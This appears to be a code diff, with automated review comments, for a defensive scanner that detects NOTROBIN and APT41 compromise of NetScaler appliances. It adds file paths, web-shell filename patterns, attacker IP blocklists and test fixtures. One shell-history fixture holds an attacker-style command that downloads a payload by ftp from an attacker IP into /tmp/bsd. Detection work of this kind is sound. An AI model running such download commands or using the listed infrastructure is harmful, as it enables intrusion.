diff --git a/scanners/fs-paths.sh b/scanners/fs-paths.sh
index f831303..51f5753 100644
--- a/scanners/fs-paths.sh
+++ b/scanners/fs-paths.sh
@@ -14,6 +14,9 @@ scan_fs_notrobin() {
 declare -a notrobin_paths;
 notrobin_paths[0]="/var/nstmp/.nscache/httpd";
 notrobin_paths[1]="/tmp/.init/httpd";
+ # from subsequent post
+ notrobin_paths[2]="/var/nstmp/.nscache/prev.sh";
+ notrobin_paths[3]="/var/nstmp/.nscache/httpd-nscache_clean";
 local found=false;
 for notrobin_path in "${notrobin_paths[@]}"; do
@@ -23,6 +26,26 @@ scan_fs_notrobin() {
 fi
 done
+ declare -a dirs;
+ dirs[0]="/var/vpn/theme";
+ dirs[1]="/var/vpn/themes";
+
+ declare -a blacklist;
+ blacklist[0]="[a-f0-9]\{32\}\.php";
+ blacklist[1]="[a-f0-9]\{32\}_[a-zA-Z0-9]\{1,12\}\.\(php\|pl\)";
+
+ for dir in "${dirs[@]}"; do
+ if [ -d "$root_directory/$dir" ]; then
+ for blackterm in "${blacklist[@]}"; do
+ local entries=$(ls "$root_directory/$dir" | grep "$blackterm");
+ if [ -n "$entries" ]; then
+ found=true;
+ report_match "$entries, known path to NOTROBIN artifact.";
+ fi
+ done
+ fi
+ done
+
 if [ "$found" != true ]; then
 debug "did not find NOTROBIN artifacts";
 fi
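Review bot: The hit in the new `ls | grep` loop is reported without its directory — `report_match "$entries, known path to NOTROBIN artifact."` prints only basenames, and when several files match one pattern they are concatenated into a single multi-line report, so the output does not say whether a file sits in `/var/vpn/theme` or `/var/vpn/themes`. The other scanners in this diff report one `$path` per hit; doing the same here means iterating over grep's output lines and prefixing `$dir`. Two smaller points on the same lines: `local entries=$(...)` masks grep's exit status, and the blacklist terms are applied as substrings, so a name like `<32 hex>.php.bak` is also reported — whether to anchor them with `^...$` depends on what the published indicator actually covers, so confirm before tightening. The enclosing function `scan_fs_notrobin` begins before this hunk.
```shell
for dir in "${dirs[@]}"; do
    if [ -d "$root_directory/$dir" ]; then
        for blackterm in "${blacklist[@]}"; do
            # one report per matching file, carrying its directory, so hits in
            # /var/vpn/theme and /var/vpn/themes can be told apart in the output
            while IFS= read -r entry; do
                found=true;
                report_match "$dir/$entry, known path to NOTROBIN artifact.";
            done < <(ls -1 "$root_directory/$dir" | grep "$blackterm");
        done
    fi
done
```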
@@ -45,11 +68,49 @@ scan_fs_isc_paths() {
 if [ "$found" != true ]; then
 debug "did not find artifact enumerated by SANS ISC";
 fi
+}
+
+scan_fs_apt41() {
+ declare -a paths;
+ paths[0]="/tmp/bsd";
+ paths[1]="/tmp/un";
+
+ local found=false;
+ for path in "${paths[@]}"; do
+ if [ -f "$root_directory/$path" ]; then
+ found=true;
+ report_match "$path, known path to post-exploitation artifact.";
+ fi
+ done
+
+ if [ "$found" != true ]; then
+ debug "did not find file system artifact";
+ fi
+}
+
+scan_fs_other_paths() {
+ declare -a paths;
+ paths[0]="/vpn/themes/imgs/tiny.php";
+ paths[1]="/vpn/themes/imgs/debug.php";
+ paths[2]="/vpn/themes/imgs/conn.php";
+
+ local found=false;
+ for path in "${paths[@]}"; do
+ if [ -f "$root_directory/$path" ]; then
+ found=true;
+ report_match "$path, known path to post-exploitation artifact.";
+ fi
+ done
+ if [ "$found" != true ]; then
+ debug "did not find file system artifact";
+ fi
 }
 scan_fs_known_paths() {
 scan_fs_netscalerd;
 scan_fs_notrobin;
 scan_fs_isc_paths;
+ scan_fs_apt41;
+ scan_fs_other_paths;
 }
diff --git a/scanners/netscaler-content.sh b/scanners/netscaler-content.sh
index e4345f9..3627eb3 100644
--- a/scanners/netscaler-content.sh
+++ b/scanners/netscaler-content.sh
@@ -45,6 +45,15 @@ ns_content_blacklist[25]="198.44.227.126";
 ns_content_blacklist[26]="/tmp/l.sh";
 ns_content_blacklist[27]="Digest::MD5";
 ns_content_blacklist[28]="Could not execute command";
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+ns_content_blacklist[29]="/tmp/bsd";
+ns_content_blacklist[30]="/tmp/un";
+ns_content_blacklist[31]="66.42.98.220";
+ns_content_blacklist[32]="/var/nstmp/.nscache/prev.sh";
+ns_content_blacklist[33]="/var/nstmp/.nscache/httpd-nscache_clean";
+ns_content_blacklist[34]="/vpn/themes/imgs/tiny.php";
+ns_content_blacklist[35]="/vpn/themes/imgs/debug.php";
+ns_content_blacklist[36]="/vpn/themes/imgs/conn.php";
 declare -a ns_exploit_dirs;
 ns_exploit_dirs[0]="/netscaler/portal/templates/";
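Review bot: `scan_fs_other_paths` tests `$root_directory/vpn/themes/imgs/{tiny,debug,conn}.php`, but every other on-disk list in this diff places the portal theme directories under `/var/vpn/` (`dirs[1]="/var/vpn/themes"` in `scan_fs_notrobin`, `ns_exploit_dirs[4]="/var/vpn/themes/"`), so `/vpn/themes/imgs/...` looks like the URI form of the indicator — right for the content and shell-history blacklists, but if the files live under `/var/vpn/themes/imgs/` on the appliance these three `[ -f ]` checks never fire. The apt41 scanner gets fixtures (`tests/file-system/apt41/tmp/bsd`, `.../tmp/un`) while `scan_fs_other_paths` gets none, which is exactly the case a fixture would have caught. Suggest confirming the on-disk location and, if it cannot be pinned down, listing both forms, e.g. `paths[3]="/var/vpn/themes/imgs/tiny.php";` and likewise for `debug.php` and `conn.php`, plus a fixture under `tests/file-system/`. The two new functions are also line-for-line copies of the same loop; a shared helper taking the report label and the path list would keep future indicator additions in one place.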
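Review bot: `ns_content_blacklist[30]="/tmp/un"` is a very short token; if the blacklist is applied as a substring match (the matching loop is outside this hunk), it also fires on benign strings such as `/tmp/unix`, `/tmp/untitled` or anything else starting with `/tmp/un`, and the same entry is added as `shell_history_blacklist[40]` in the next hunk of `scanners/shell-history.sh`. If the matcher is a BRE grep, as the `\{32\}` terms in `fs-paths.sh` suggest, a trailing delimiter such as `"/tmp/un\([^a-zA-Z0-9_]\|$\)"` would keep the true hits while dropping the longer names; if it is a fixed-string match, a comment `# short token, expect false positives on /tmp/un*` at least tells the analyst why. In the shell-history hunk the existing entries `[35]`–`[38]` end without `;` while the new `[39]`–`[46]` end with one; pick one form for the list.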
@@ -59,6 +68,7 @@ ns_exploit_dirs[1]="/netscaler/portal/scripts/";
 ns_exploit_dirs[2]="/var/vpn/bookmark/";
 ns_exploit_dirs[3]="/var/tmp/netscaler/portal/templates/";
 ns_exploit_dirs[4]="/var/vpn/themes/";
+ns_exploit_dirs[5]="/var/vpn/theme/";
 # custom output formatting for matches.
 # if the filename ends with .xml print the whole file,
diff --git a/scanners/shell-history.sh b/scanners/shell-history.sh
index cb96e34..272f804 100644
--- a/scanners/shell-history.sh
+++ b/scanners/shell-history.sh
@@ -50,6 +50,15 @@ shell_history_blacklist[35]="157.157.87.22"
 shell_history_blacklist[36]="193.187.174.104"
 shell_history_blacklist[37]="62.113.112.33"
 shell_history_blacklist[38]="217.12.221.12"
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+shell_history_blacklist[39]="/tmp/bsd";
+shell_history_blacklist[40]="/tmp/un";
+shell_history_blacklist[41]="66.42.98.220";
+shell_history_blacklist[42]="/var/nstmp/.nscache/prev.sh";
+shell_history_blacklist[43]="/var/nstmp/.nscache/httpd-nscache_clean";
+shell_history_blacklist[44]="/vpn/themes/imgs/tiny.php";
+shell_history_blacklist[45]="/vpn/themes/imgs/debug.php";
+shell_history_blacklist[46]="/vpn/themes/imgs/conn.php";
 declare -a shell_history_paths;
 shell_history_paths[0]="/var/log/bash.log";
diff --git a/tests/file-system/apt41/.test b/tests/file-system/apt41/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/apt41/tmp/bsd b/tests/file-system/apt41/tmp/bsd
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/apt41/tmp/un b/tests/file-system/apt41/tmp/un
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-random/.test b/tests/file-system/notrobin-var-vpn-theme-random/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php b/tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-y/.test b/tests/file-system/notrobin-var-vpn-theme-y/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl b/tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl
new file mode 100644
index 0000000..e69de29
diff --git a/tests/shell-history/bsd/.test b/tests/shell-history/bsd/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/shell-history/bsd/var/log/bash.log b/tests/shell-history/bsd/var/log/bash.log
new file mode 100644
index 0000000..f410a30
--- /dev/null
+++ b/tests/shell-history/bsd/var/log/bash.log
@@ -0,0 +1 @@
+Jan 19 24:26:52 ns bash[1297]: root on /dev/pts/0 shell_command="/usr/bin/ftp -o /tmp/bsd ftp://xxxxxxxxxxxxxxxxxxxxxx66.42.98.220/bsd"